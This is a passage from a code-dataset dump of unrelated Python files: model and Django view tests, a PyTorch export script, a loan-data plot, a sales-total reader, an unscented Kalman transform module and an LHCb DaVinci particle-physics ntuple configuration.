SectorModel)\n\n assert model.name == 'water_supply'\n assert model.intervention_names == 
['water_asset_a']\n assert model.interventions == assets\n\n def test_path_not_found(self):\n builder = SectorModelBuilder('water_supply', Mock())\n with raises(FileNotFoundError) as ex:\n builder.load_model('/fictional/path/to/model.py', 'WaterSupplySectorModel')\n msg = \"Cannot find '/fictional/path/to/model.py' for the 'water_supply' model\"\n assert msg in str(ex.value)\n\n\nclass TestInputs:\n\n def test_add_no_inputs(self, setup_project_folder):\n model_path = str(setup_project_folder.join('models', 'water_supply', '__init__.py'))\n registers = {'regions': Mock(),\n 'intervals': Mock()}\n\n builder = SectorModelBuilder('water_supply_test', registers)\n builder.load_model(model_path, 'WaterSupplySectorModel')\n builder.add_inputs(None)\n sector_model = builder.finish()\n assert isinstance(sector_model.model_inputs, MetadataSet)\n actual_inputs = sector_model.model_inputs.names\n assert actual_inputs == []\n\n\nclass TestSectorModel(object):\n\n def test_interventions_names(self):\n assets = [\n {'name': 'water_asset_a'},\n {'name': 'water_asset_b'},\n {'name': 'water_asset_c'}\n ]\n model = EmptySectorModel('test_model')\n model.interventions = assets\n\n intervention_names = model.intervention_names\n\n assert len(intervention_names) == 3\n assert 'water_asset_a' in intervention_names\n assert 'water_asset_b' in intervention_names\n assert 'water_asset_c' in intervention_names\n\n def test_interventions(self):\n interventions = [\n {\n 'name': 'water_asset_a',\n 'capital_cost': 1000,\n 'economic_lifetime': 25,\n 'operational_lifetime': 25\n },\n {\n 'name': 'water_asset_b',\n 'capital_cost': 1500,\n },\n {\n 'name': 'water_asset_c',\n 'capital_cost': 3000,\n }\n ]\n model = EmptySectorModel('test_model')\n model.interventions = interventions\n actual = model.interventions\n\n assert actual == interventions\n\n assert sorted(model.intervention_names) == [\n 'water_asset_a',\n 'water_asset_b',\n 'water_asset_c'\n ]\n\n\nclass TestParameters():\n\n def test_add_parameter(self):\n \"\"\"Adding a parameter adds a reference to the parameter list entry to\n the model that contains it.\n \"\"\"\n\n model = copy(EmptySectorModel('test_model'))\n model.simulate = lambda x, y: {'savings': y['smart_meter_savings']}\n\n param_config = {'name': 'smart_meter_savings',\n 'description': 'The savings from smart meters',\n 'absolute_range': (0, 100),\n 'suggested_range': (3, 10),\n 'default_value': 3,\n 'units': '%'}\n model.add_parameter(param_config)\n\n assert isinstance(model.parameters, ParameterList)\n\n param_config['parent'] = model\n\n assert model.parameters['smart_meter_savings'] == param_config\n\n actual = model.simulate(2010, {'smart_meter_savings': 3})\n expected = {'savings': 3}\n assert actual == expected\n","sub_path":"tests/model/test_sector_model.py","file_name":"test_sector_model.py","file_ext":"py","file_size_in_byte":7186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"424710535","text":"from django.core.urlresolvers import reverse\nfrom django.test import TestCase\n\nfrom server.models import *\n\n\nclass PlayerViewTests(TestCase):\n def setUp(self):\n self.username = 'test_user'\n self.password = 'test_password'\n self.user = User.objects.create_user(username=self.username, password=self.password)\n self.client.login(username=self.username, password=self.password)\n\n self.region = Region.objects.create(\n name='First Region'\n )\n self.hunt = Hunt.objects.create(\n name='First hunt',\n 
private_token='j14WVsOPsIdzQIZGQeymFmpPv4LqpHQWck8ua0ZdCY71'\n        )\n        self.player = Player.objects.create(\n            uuid='41f94400-2a3e-408a-9b80-1774724f62af',\n            name='First Agent'\n        )\n        self.hunt_token = AuthorizedUsers.objects.create(\n            hunt=self.hunt,\n            user=self.user\n        )\n        self.item1 = Item.objects.create(\n            uuid='41f94400-2a3e-408a-9b80-1774724f62af',\n            name='First Item',\n            type=Item.TYPE_PRIZE,\n            position_x=25.00,\n            position_y=50.00,\n            position_z=75.00,\n            points=15,\n            enabled=True,\n            region=self.region,\n            hunt=self.hunt\n        )\n        self.item2 = Item.objects.create(\n            uuid='aaaaaaaa-2aaa-408a-aaaa-aaaaaaaaaaaa',\n            name='Second Item',\n            type=Item.TYPE_CREDIT,\n            position_x=125.00,\n            position_y=150.00,\n            position_z=175.00,\n            points=13,\n            enabled=True,\n            region=self.region,\n            hunt=self.hunt\n        )\n        self.transaction1 = Transaction.objects.create(\n            points=15,\n            player_x=0.0,\n            player_y=25.0,\n            player_z=50.0,\n            item_x=75.0,\n            item_y=100.0,\n            item_z=125.0,\n            player=self.player,\n            region=self.region,\n            hunt=self.hunt,\n            item=self.item1\n        )\n        self.transaction2 = Transaction.objects.create(\n            points=13,\n            player_x=10.0,\n            player_y=125.0,\n            player_z=150.0,\n            item_x=175.0,\n            item_y=1100.0,\n            item_z=1125.0,\n            player=self.player,\n            region=self.region,\n            hunt=self.hunt,\n            item=self.item2\n        )\n\n    def test_authorized(self):\n        server_data = dict(\n            hunt_id=self.hunt.id,\n        )\n\n        response = self.client.get(reverse('frontend:view_hunt_players', kwargs=server_data))\n        self.assertEqual(response.status_code, 200)\n","sub_path":"frontend/tests/views/test_view_hunt_players_view.py","file_name":"test_view_hunt_players_view.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"35041571","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/12/7 18:05\n# @Author : Scheaven\n# @File : 001_test.py\n# @description:\nimport torch\nclass MyModel(torch.nn.Module):\n    def __init__(self, N, M):\n        super(MyModel, self).__init__()\n        self.linear = torch.nn.Linear(N, M)\n\n    def forward(self, inputs):\n        output = self.linear(inputs)\n        return output\n\n\nif __name__== \"__main__\":\n    B, N, M = 64, 32, 8\n    model = MyModel(N, M)\n\n    # Method 1: torch.jit.script\n    traced_script_module = torch.jit.script(model)\n    traced_script_module.save(\"model.pt\")\n\n\n    # model = BaseLine().model.cpu().eval()\n    # # An example input you would normally provide to your model's forward() method.\n    # example = torch.rand(1, 3, 256, 128)\n\n    # Method 2: torch.jit.trace\n    # # Use torch.jit.trace to generate a torch.jit.ScriptModule via tracing.\n    # traced_script_module = torch.jit.trace(model, example)\n    # traced_script_module.save(\"demo/model.pt\")","sub_path":"001_pytorch2libtorch_model/002_py2CPP_model.py","file_name":"002_py2CPP_model.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"571352312","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\ndata = pd.read_csv('../LoanStats3a.csv')\r\nindex = ['< 1 year', '1 year', '2 years', '3 years', '4 years', \r\n'5 years', '6 years', '7 years', '8 years', '9 years','10 years','10+ years']\r\n\r\nmapping = pd.Series([0,1,2,3,4,5,6,7,8,9,10,11], index)\r\ndata['emp_length_int'] = data['emp_length'].map(mapping)\r\ntest_emp_len_int = data['emp_length_int']\r\n\r\nx = test_emp_len_int\r\ny = data['loan_amnt']\r\nplt.xticks(x, index)\r\n\r\nplt.hist(test_emp_len_int.dropna(), color='blue')\r\nplt.autoscale(tight=True)\r\nplt.xticks(rotation=45)\r\n\r\n
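# Pin the y-axis range and relabel the integer ticks on the current Axes.\r\naxes = 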
plt.gca()\naxes.set_ylim([min(y),max(y)])\naxes.set_xticks([i for i in range(1,12) ])\naxes.set_xticklabels(index)\n\nplt.show()\n\n#fig = plt.gcf()\n#fig.set_size_inches(10, 10, forward=True)\n#fig.savefig('test.png', dpi=100)\n","sub_path":"code_for_challenge/employee_length_vs_loan_amt.py","file_name":"employee_length_vs_loan_amt.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"115794886","text":"def main():\r\n #Initialize an accumulator\r\n total = 0.0\r\n\r\n try:\r\n #Open the sales_data.txt file\r\n infile = open('sales_data.txt', 'r')\r\n\r\n #Read value from file\r\n for line in infile:\r\n amount = float(line)\r\n total += amount\r\n\r\n #Close file\r\n infile.close()\r\n\r\n #Print total\r\n print(format(total, ',.2f'))\r\n except:\r\n print('An error occured.')\r\n\r\nmain()\r\n","sub_path":"Chap 6/sales_report2.py","file_name":"sales_report2.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"259380700","text":"from .timeseries import StateSpaceModel, AffineProcess\nimport torch\nfrom math import sqrt\nfrom torch.distributions import Normal, MultivariateNormal, Independent\nfrom .utils import construct_diag, TempOverride\nfrom .module import Module, TensorContainer\n\n\ndef _propagate_sps(spx, spn, process, temp_params):\n \"\"\"\n Propagate the Sigma points through the given process.\n :param spx: The state Sigma points\n :type spx: torch.Tensor\n :param spn: The noise Sigma points\n :type spn: torch.Tensor\n :param process: The process\n :type process: AffineProcess\n :return: Translated and scaled sigma points\n :rtype: torch.Tensor\n \"\"\"\n\n is_md = process.ndim > 1\n\n if not is_md:\n spx = spx.squeeze(-1)\n spn = spn.squeeze(-1)\n\n with TempOverride(process, '_theta_vals', temp_params):\n out = process.propagate_u(spx, u=spn)\n return out if is_md else out.unsqueeze(-1)\n\n\ndef _covcalc(a, b, wc):\n \"\"\"\n Calculates the covariance from a * b^t\n :param a: The `a` matrix\n :type a: torch.Tensor\n :param b: The `b` matrix\n :type b: torch.Tensor\n :return: The covariance\n :rtype: torch.Tensor\n \"\"\"\n cov = a.unsqueeze(-1) * b.unsqueeze(-2)\n\n return (wc[:, None, None] * cov).sum(-3)\n\n\ndef _get_meancov(spxy, wm, wc):\n \"\"\"\n Calculates the mean and covariance given sigma points for 2D processes.\n :param spxy: The state/observation sigma points\n :type spxy: torch.Tensor\n :param wm: The W^m\n :type wm: torch.Tensor\n :param wc: The W^c\n :type wc: torch.Tensor\n :return: Mean and covariance\n :rtype: tuple of torch.Tensor\n \"\"\"\n\n x = (wm.unsqueeze(-1) * spxy).sum(-2)\n centered = spxy - x.unsqueeze(-2)\n\n return x, _covcalc(centered, centered, wc)\n\n\nclass UnscentedTransform(Module):\n def __init__(self, model, a=1, b=2, k=0):\n \"\"\"\n Implements the Unscented Transform for a state space model.\n :param model: The model\n :type model: StateSpaceModel\n :param a: The alpha parameter. Defined on the interval [0, 1]\n :type a: float\n :param b: The beta parameter. Optimal value for Gaussian models is 2\n :type b: float\n :param k: The kappa parameter. 
To control the semi-definiteness\n :type k: float\n \"\"\"\n\n # ===== Model ===== #\n self._model = model\n self._ndim = 2 * model.hidden_ndim + model.obs_ndim\n\n if self._model.hidden.distributional_theta or self._model.observable.distributional_theta:\n raise ValueError('Cannot currently handle case when distribution is parameterized!')\n\n # ===== Parameters =====#\n self._a = a\n self._b = b\n self._lam = a ** 2 * (self._ndim + k) - self._ndim\n\n # ===== Auxiliary variables ===== #\n self._ymean = None\n self._ycov = None\n self._views = None\n\n self._diaginds = range(model.hidden_ndim)\n\n def modules(self):\n return {}\n\n def _set_slices(self):\n \"\"\"\n Sets the different slices for selecting states and noise.\n :return: Instance of self\n :rtype: UnscentedTransform\n \"\"\"\n\n self._sslc = slice(self._model.hidden_ndim)\n self._hslc = slice(self._model.hidden_ndim, 2 * self._model.hidden_ndim)\n self._oslc = slice(2 * self._model.hidden_ndim, None)\n\n return self\n\n def _set_weights(self):\n \"\"\"\n Generates the weights used for sigma point construction.\n :return: Instance of self\n :rtype: UnscentedTransform\n \"\"\"\n\n self._wm = torch.zeros(1 + 2 * self._ndim)\n self._wc = self._wm.clone()\n self._wm[0] = self._lam / (self._ndim + self._lam)\n self._wc[0] = self._wm[0] + (1 - self._a ** 2 + self._b)\n self._wm[1:] = self._wc[1:] = 1 / 2 / (self._ndim + self._lam)\n\n return self\n\n def _set_arrays(self, x):\n \"\"\"\n Sets the mean and covariance arrays.\n :param x: The initial state.\n :type x: torch.Tensor\n :return: Instance of self\n :rtype: UnscentedTransform\n \"\"\"\n\n # ==== Define empty arrays ===== #\n if not isinstance(x, torch.Tensor):\n x = torch.tensor(x)\n\n parts = x.shape[:-1] if self._model.hidden_ndim > 1 else x.shape\n\n self._mean = torch.zeros((*parts, self._ndim))\n self._cov = torch.zeros((*parts, self._ndim, self._ndim))\n self._sps = torch.zeros((*parts, 1 + 2 * self._ndim, self._ndim))\n\n # TODO: Perhaps move this to Timeseries?\n self._views = TensorContainer()\n shape = (parts[0], 1) if len(parts) > 0 else parts\n\n if len(parts) > 1:\n shape += (1,)\n\n for model in [self._model.hidden, self._model.observable]:\n params = tuple()\n for p in model.theta:\n if p.trainable:\n view = p.view(*shape, *p.shape[1:])\n else:\n view = p\n\n params += (view,)\n\n self._views.append(TensorContainer(*params))\n\n return self\n\n def initialize(self, x):\n \"\"\"\n Initializes UnscentedTransform class.\n :param x: The initial values of the mean of the distribution.\n :type x: torch.Tensor\n :return: Instance of self\n :rtype: UnscentedTransform\n \"\"\"\n\n self._set_weights()._set_slices()._set_arrays(x)\n\n # ==== Set mean ===== #\n self._mean[..., self._sslc] = x if self._model.hidden_ndim > 1 else x.unsqueeze(-1)\n\n # ==== Set state covariance ===== #\n var = self._model.hidden.initial_dist.variance\n if self._model.hidden_ndim < 2:\n var.unsqueeze_(-1)\n\n self._cov[..., self._sslc, self._sslc] = construct_diag(var)\n\n # ==== Set noise covariance ===== #\n self._cov[..., self._hslc, self._hslc] = construct_diag(self._model.hidden.increment_dist.variance)\n self._cov[..., self._oslc, self._oslc] = construct_diag(self._model.observable.increment_dist.variance)\n\n return self\n\n def get_sps(self):\n \"\"\"\n Constructs the Sigma points used for propagation.\n :return: Sigma points\n :rtype: torch.Tensor\n \"\"\"\n cholcov = sqrt(self._lam + self._ndim) * torch.cholesky(self._cov)\n\n self._sps[..., 0, :] = self._mean\n self._sps[..., 
1:self._ndim+1, :] = self._mean[..., None, :] + cholcov\n self._sps[..., self._ndim+1:, :] = self._mean[..., None, :] - cholcov\n\n return self._sps\n\n def propagate_sps(self, only_x=False):\n \"\"\"\n Propagate the Sigma points through the given process.\n :return: Sigma points of x and y\n :rtype: tuple of torch.Tensor\n \"\"\"\n\n sps = self.get_sps()\n\n spx = _propagate_sps(sps[..., self._sslc], sps[..., self._hslc], self._model.hidden, self._views[0])\n if only_x:\n return spx\n\n spy = _propagate_sps(spx, sps[..., self._oslc], self._model.observable, self._views[1])\n\n return spx, spy\n\n @property\n def xmean(self):\n \"\"\"\n Returns the mean of the latest state.\n :return: The mean of state\n :rtype: torch.Tensor\n \"\"\"\n\n return self._mean[..., self._sslc].clone()\n\n @xmean.setter\n def xmean(self, x):\n \"\"\"\n Sets the mean of the latest state.\n :param x: The mean state to use for overriding\n :type x: torch.Tensor\n \"\"\"\n\n self._mean[..., self._sslc] = x\n\n @property\n def xcov(self):\n \"\"\"\n Returns the covariance of the latest state.\n :return: The state covariance\n :rtype: torch.Tensor\n \"\"\"\n\n return self._cov[..., self._sslc, self._sslc]\n\n @xcov.setter\n def xcov(self, x):\n \"\"\"\n Sets the covariance of the latest state\n :param x: The state covariance to use for overriding\n :type x: torch.Tensor\n \"\"\"\n\n self._cov[..., self._sslc, self._sslc] = x\n\n @property\n def ymean(self):\n \"\"\"\n Returns the mean of the observation.\n :return: The mean of the observational process\n :rtype: torch.Tensor\n \"\"\"\n\n return self._ymean\n\n @property\n def ycov(self):\n \"\"\"\n Returns the covariance of the observation.\n :return: The covariance of the observational process\n :rtype: torch.Tensor\n \"\"\"\n\n return self._ycov\n\n @property\n def x_dist(self):\n \"\"\"\n Returns the current X-distribution.\n :rtype: Normal|MultivariateNormal\n \"\"\"\n\n if self._model.hidden_ndim < 2:\n return Normal(self.xmean[..., 0], self.xcov[..., 0, 0].sqrt())\n\n return MultivariateNormal(self.xmean, scale_tril=torch.cholesky(self.xcov))\n\n @property\n def x_dist_indep(self):\n \"\"\"\n Returns the current X-distribution but independent.\n :rtype: Normal|MultivariateNormal\n \"\"\"\n\n if self._model.hidden_ndim < 2:\n return self.x_dist\n\n dist = Normal(self.xmean, self.xcov[..., self._diaginds, self._diaginds].sqrt())\n return Independent(dist, 1)\n\n @property\n def y_dist(self):\n \"\"\"\n Returns the current Y-distribution.\n :rtype: Normal|MultivariateNormal\n \"\"\"\n if self._model.obs_ndim < 2:\n return Normal(self.ymean[..., 0], self.ycov[..., 0, 0].sqrt())\n\n return MultivariateNormal(self.ymean, scale_tril=torch.cholesky(self.ycov))\n\n def construct(self, y):\n \"\"\"\n Constructs the mean and covariance given the current observation and previous state.\n :param y: The current observation\n :type y: torch.Tensor|float\n :return: Self\n :rtype: UnscentedTransform\n \"\"\"\n\n # ==== Get mean and covariance ===== #\n txmean, txcov, ymean, ycov = self._get_m_and_p(y)\n\n # ==== Overwrite mean and covariance ==== #\n self._ymean = ymean\n self._ycov = ycov\n self._mean[..., self._sslc] = txmean\n self._cov[..., self._sslc, self._sslc] = txcov\n\n return self\n\n def get_meancov(self):\n \"\"\"\n Constructs the mean and covariance for the hidden and observable process respectively.\n :return: The mean and covariance\n :rtype: tuple\n \"\"\"\n\n # ==== Propagate Sigma points ==== #\n spx, spy = self.propagate_sps()\n\n # ==== Construct mean and 
covariance ==== #\n xmean, xcov = _get_meancov(spx, self._wm, self._wc)\n ymean, ycov = _get_meancov(spy, self._wm, self._wc)\n\n return (xmean, xcov, spx), (ymean, ycov, spy)\n\n def _get_m_and_p(self, y):\n \"\"\"\n Helper method for generating the mean and covariance.\n :param y: The latest observation\n :type y: float|torch.Tensor\n :return: The estimated mean and covariances of state and observation\n :rtype: tuple of torch.Tensor\n \"\"\"\n\n (xmean, xcov, spx), (ymean, ycov, spy) = self.get_meancov()\n\n # ==== Calculate cross covariance ==== #\n if xmean.dim() > 1:\n tx = spx - xmean.unsqueeze(-2)\n else:\n tx = spx - xmean\n\n if ymean.dim() > 1:\n ty = spy - ymean.unsqueeze(-2)\n else:\n ty = spy - ymean\n\n xycov = _covcalc(tx, ty, self._wc)\n\n # ==== Calculate the gain ==== #\n gain = torch.matmul(xycov, ycov.inverse())\n\n # ===== Calculate true mean and covariance ==== #\n txmean = xmean + torch.matmul(gain, (y - ymean).unsqueeze(-1))[..., 0]\n\n temp = torch.matmul(ycov, gain.transpose(-1, -2))\n txcov = xcov - torch.matmul(gain, temp)\n\n return txmean, txcov, ymean, ycov","sub_path":"pyfilter/unscentedtransform.py","file_name":"unscentedtransform.py","file_ext":"py","file_size_in_byte":11698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"198266984","text":"# Use DaVinci v33r8 and ganga 6\nimport sys, os\n# to be able to import jobSetup using gaudirun\nsys.path.append(os.getcwd())\nfrom jobSetup import *\n\ntry:\n dataSample = dataSamples[open('dataSample.txt').readline()] \nexcept IOError:\n pass # keep dataSample defined in jobSetup.py and loaded with from import *\n\n\nfrom Gaudi.Configuration import *\nfrom DecayTreeTuple.Configuration import *\nimport GaudiKernel.SystemOfUnits as Units\nfrom Configurables import DeterministicPrescaler\n\n# Triggers\nL0_list = ['L0HadronDecision', 'L0MuonDecision', 'L0ElectronDecision']\nHLT1_list = ['Hlt1TrackAllL0Decision', 'Hlt1TrackPhotonDecision', 'Hlt1TrackMuonDecision']\nHLT2_list = ['Hlt2ExpressKSDecision', 'Hlt2CharmHadD02HHXDst_BaryonhhXWideMassDecision']\ntrigger_list = L0_list + HLT1_list + HLT2_list\n\nclass strippingLine:\n \"\"\"\n Class to store information about stripping line that I will need to make nTuple\n \"\"\"\n def __init__(self,name, lineName, dec, branches):\n self.name = name\n self.lineName = lineName\n self.dec = dec \n self.branches = branches \n self.lineLocation = \"Phys/\"+lineName+\"/Particles\"\n \n \n def select(self):\n \"\"\"\n Get data and selection\n \"\"\"\n\n from PhysSelPython.Wrappers import Selection, SelectionSequence, DataOnDemand, AutomaticData\n # from StandardParticles import StdLooseMuons, StdLooseKaons\n from Configurables import FilterDesktop, CombineParticles, OfflineVertexFitter, LoKi__HDRFilter \n from GaudiKernel.PhysicalConstants import c_light\n\n evtPreselectors = []\n\n if dataSample.isPrescaled != False:\n if dataSample.isPrescaled == True:\n dataSample.isPrescaled = 0.1\n prescaler = DeterministicPrescaler(\"Prescaler\", AcceptFraction = dataSample.isPrescaled)\n evtPreselectors.append(prescaler)\n\n\n # # Stripping filter\n strippingFilter = LoKi__HDRFilter( 'StripPassFilter', Code=\"HLT_PASS('Stripping\"+self.lineName+\"Decision')\", Location=\"/Event/Strip/Phys/DecReports\" )\n evtPreselectors.append(strippingFilter)\n\n\n stripped_data = AutomaticData(Location = self.lineLocation)\n \n # Trigger selection\n from Configurables import TisTosParticleTagger\n _tisTosFilter = TisTosParticleTagger( self.name + 
\"Triggered\" )\n _tisTosFilter.TisTosSpecs = { 'L0Global%TUS' : 0,\n 'L0Global%TIS' : 0,\n }\n for trigger in trigger_list:\n for tistos in ['TIS', 'TUS']:\n _tisTosFilter.TisTosSpecs['{0}%{1}'.format(trigger, tistos)] = 0\n \n triggered_data = Selection( self.name+'TriggerSelection',\n Algorithm = _tisTosFilter,\n RequiredSelections = [ stripped_data ],\n )\n \n Candidate_selection = stripped_data #triggered_data \n \n self.sequence = SelectionSequence('Seq'+self.name,\n TopSelection = Candidate_selection,\n EventPreSelector = evtPreselectors)\n \n def makeTuple(self):\n \"\"\"\n Make tuple\n \"\"\"\n\n from Configurables import FitDecayTrees, DecayTreeTuple, TupleToolDecayTreeFitter, TupleToolDecay, TupleToolTrigger, TupleToolTISTOS, TupleToolPropertime, PropertimeFitter, TupleToolKinematic, TupleToolGeometry, TupleToolEventInfo, TupleToolPrimaries, TupleToolPid, TupleToolTrackInfo, TupleToolRecoStats, TupleToolMCTruth, LoKi__Hybrid__TupleTool, LoKi__Hybrid__EvtTupleTool\n \n\n tuple = DecayTreeTuple('Tuple'+self.name) # I can put as an argument a name if I use more than a DecayTreeTuple\n tuple.Inputs = [ self.sequence.outputLocation() ]\n tuple.Decay = self.dec\n tuple.ToolList = ['TupleToolKinematic',\n 'TupleToolEventInfo', \n 'TupleToolTrackInfo',\n 'TupleToolPid',\n 'TupleToolGeometry', \n 'TupleToolAngles', # Helicity angle\n # 'TupleToolPropertime', #proper time TAU of reco particles\n ]\n\n \n tuple.InputPrimaryVertices = '/Event/Charm/Rec/Vertex/Primary'\n\n\n # Other event infos\n tuple.addTupleTool('LoKi::Hybrid::EvtTupleTool/LoKi_Evt')\n tuple.LoKi_Evt.VOID_Variables = {\n #\"nSPDHits\" : \" CONTAINS('Raw/Spd/Digits') \" ,\n 'nTracks' : \" CONTAINS ('Charm/Rec/Track/Best') \" ,\n }\n \n # # Other variables\n # tuple.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_All')\n # tuple.LoKi_All.Variables = {\n # 'BPVIPCHI2' : 'BPVIPCHI2()',\n # 'BPVDIRA' : 'BPVDIRA',\n # 'BPVLTFITCHI2' : 'BPVLTFITCHI2()', \n # } \n \n tuple.addBranches(self.branches)\n \n tuple.phi.addTupleTool(\"LoKi::Hybrid::TupleTool/LoKi_phi\")\n tuple.phi.LoKi_phi.Variables = {\n 'DOCAMAX' : 'DOCAMAX',\n \"MassDiff_Phi\" : \"DMASS('phi(1020)')\",\n \"BPVDIRA\" : \"BPVDIRA\",\n \"IPS_Phi\" : \"MIPCHI2DV(PRIMARY)\",\n \"VFASPF_CHI2DOF\" : \"VFASPF(VCHI2/VDOF)\",\n \"VFASPF_CHI2\" : \"VFASPF(VCHI2)\",\n \"BPVIPCHI2\" : \"BPVIPCHI2()\",\n \"ADOCA\" : \"DOCA(1,2)\",\n \"ADOCACHI2\" : \"DOCACHI2(1,2)\",\n\n \"DTF_CHI2_PV\" : \"DTF_CHI2( True, 'phi(1020)' )\",\n \"DTF_NDOF_PV\" : \"DTF_NDOF( True, 'phi(1020)' )\",\n \"DTF_M_PV\" : \"DTF_FUN ( M, True, 'phi(1020)' )\",\n \"DTF_M_Ks1_PV\" : \"DTF_FUN ( CHILD(M,1), True, 'phi(1020)' )\",\n \"DTF_M_Ks2_PV\" : \"DTF_FUN ( CHILD(M,2), True, 'phi(1020)' )\",\n \n # \"DTF_CTAU_Ks1\" : \"DTF_CTAU(1, False, 'phi(1020)' )\",\n # \"DTF_CTAU_Ks2\" : \"DTF_CTAU(2, False, 'phi(1020)' )\",\n \n \n }\n \n\n def mySharedConf_Ks(branch):\n atool=branch.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_Ks')\n atool.Variables = {\n \"BPVDIRA\" : \"BPVDIRA\",\n \"VFASPF_CHI2DOF\" : \"VFASPF(VCHI2/VDOF)\",\n \"VFASPF_CHI2\" : \"VFASPF(VCHI2)\",\n \"BPVIPCHI2\" : \"BPVIPCHI2()\",\n \"BPVVD\" : \"BPVVD\",\n \"BPVVDCHI2\" : \"BPVVDCHI2\",\n \"ADOCA\" : \"DOCA(1,2)\",\n \"ADOCACHI2\" : \"DOCACHI2(1,2)\",\n 'BPVLTIME' : 'BPVLTIME()',\n }\n PropertimeTool = branch.addTupleTool(\"TupleToolPropertime/Propertime_Ks\")\n \n\n mySharedConf_Ks(tuple.Ks1)\n mySharedConf_Ks(tuple.Ks2)\n\n def mySharedConf_pi(branch):\n atool=branch.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_pi')\n atool.Variables = {\n 'TRCHI2DOF' 
: 'TRCHI2DOF',\n 'TRGHOSTPROB' : 'TRGHOSTPROB',\n }\n\n mySharedConf_pi(tuple.pi1)\n mySharedConf_pi(tuple.pi2) \n mySharedConf_pi(tuple.pi3)\n mySharedConf_pi(tuple.pi4) \n\n \n # Triggers: \n tuple.phi.addTupleTool('TupleToolTISTOS/TISTOS')\n tuple.phi.TISTOS.TriggerList = trigger_list\n tuple.phi.TISTOS.VerboseL0 = True\n tuple.phi.TISTOS.VerboseHlt1 = True\n tuple.phi.TISTOS.VerboseHlt2 = True\n \n \n if dataSample.isMC:\n from Configurables import MCDecayTreeTuple, MCTupleToolKinematic, TupleToolMCTruth, MCTupleToolHierarchy, MCTupleToolReconstructed, MCTupleToolAngles, TupleToolMCBackgroundInfo\n tuple.addTupleTool('TupleToolMCTruth/MCTruth')\n tuple.MCTruth.ToolList = ['MCTupleToolKinematic',\n 'MCTupleToolHierarchy',\n 'MCTupleToolReconstructed',\n 'MCTupleToolAngles',\n ]\n tuple.phi.addTupleTool( \"TupleToolMCBackgroundInfo\")\n\n \n self.sequence.sequence().Members += [tuple]\n\n # tuple.OutputLevel = DEBUG\n\n############################################################\ndef addMCTuple(name, decayDescriptor):\n '''\n Given name and decay descriptor, add MCTuple to the main DaVinci Sequence\n '''\n # MC \n mcTuple = MCDecayTreeTuple('MCTuple'+name) # I can put as an argument a name if I use more than a MCDecayTreeTuple\n mcTuple.Decay = decayDescriptor #'[phi(1020) -> ^(KS0 -> ^pi+ ^pi-) ^(KS0 -> ^pi+ ^pi-)]CC'\n mcTuple.ToolList = ['MCTupleToolKinematic',\n 'TupleToolEventInfo',\n 'MCTupleToolHierarchy',\n \"TupleToolMCBackgroundInfo\",\n ]\n DaVinci().UserAlgorithms += [mcTuple]\n \n\n\n############################################################\n## Configure DaVinci\nfrom Configurables import DaVinci\n\nif not dataSample.isMC:\n DaVinci.RootInTES = '/Event/Charm'\n DaVinci().InputType= 'MDST'\nelse:\n DaVinci().InputType= 'DST'\n \nDaVinci().Simulation = dataSample.isMC\nDaVinci().DataType = dataSample.dataType\nDaVinci().EvtMax = nEvents # 100000\nDaVinci().Lumi = not dataSample.isMC\n\nfrom Configurables import CondDB\nCondDB(LatestGlobalTagByDataType=dataSample.dataType)\nif dataSample.DDDBtag: DaVinci().DDDBtag = dataSample.DDDBtag \nif dataSample.CondDBtag: DaVinci().CondDBtag = dataSample.CondDBtag \n\n#DaVinci().EventPreFilters += [strippingFilter]\n#if dataSample.isMC: DaVinci().UserAlgorithms += [mcTuple]\n\n\n##Debug Background#\n# from Configurables import PrintDecayTree\n# printTree = PrintDecayTree(Inputs = [ location ])\n# DaVinci().appendToMainSequence( [ printTree ] )\n# from Configurables import PrintMCTree, PrintMCDecayTreeTool\n# mctree = PrintMCTree(\"PrintDs\")\n# mctree.addTool(PrintMCDecayTreeTool, name = \"PrintMC\")\n# mctree.PrintMC.Information = \"Name M P Px Py Pz Pt\"\n# mctree.ParticleNames = [ \"D_s+\", \"D_s-\"]\n# mctree.Depth = 3\n# Xib_sequence.sequence().Members += [ mctree ] \n##################\n\n\nPhi2KsKs_line = strippingLine(name = 'Ds_Phi2KsKs',\n lineName = 'PhiToKSKS_PhiToKsKsLine',\n dec = '[D_s+ -> ^(phi(1020) -> ^(KS0 -> ^pi+ ^pi-) ^(KS0 -> ^pi+ ^pi-)) ^pi+]CC',\n branches = {'Ds' : '[D_s+ -> (phi(1020) -> (KS0 -> pi+ pi-) (KS0 -> pi+ pi-)) pi+]CC',\n 'phi' : '[D_s+ -> ^(phi(1020) -> (KS0 -> pi+ pi-) (KS0 -> pi+ pi-)) pi+]CC',\n 'Ks1' : '[D_s+ -> (phi(1020) -> ^(KS0 -> pi+ pi-) (KS0 -> pi+ pi-)) pi+]CC',\n 'Ks2' : '[D_s+ -> (phi(1020) -> (KS0 -> pi+ pi-) ^(KS0 -> pi+ pi-)) pi+]CC',\n 'pi1' : '[D_s+ -> (phi(1020) -> (KS0 -> ^pi+ pi-) (KS0 -> pi+ pi-)) pi+]CC',\n 'pi2' : '[D_s+ -> (phi(1020) -> (KS0 -> pi+ ^pi-) (KS0 -> pi+ pi-)) pi+]CC',\n 'pi3' : '[D_s+ -> (phi(1020) -> (KS0 -> pi+ pi-) (KS0 -> ^pi+ pi-)) pi+]CC',\n 'pi4' : 
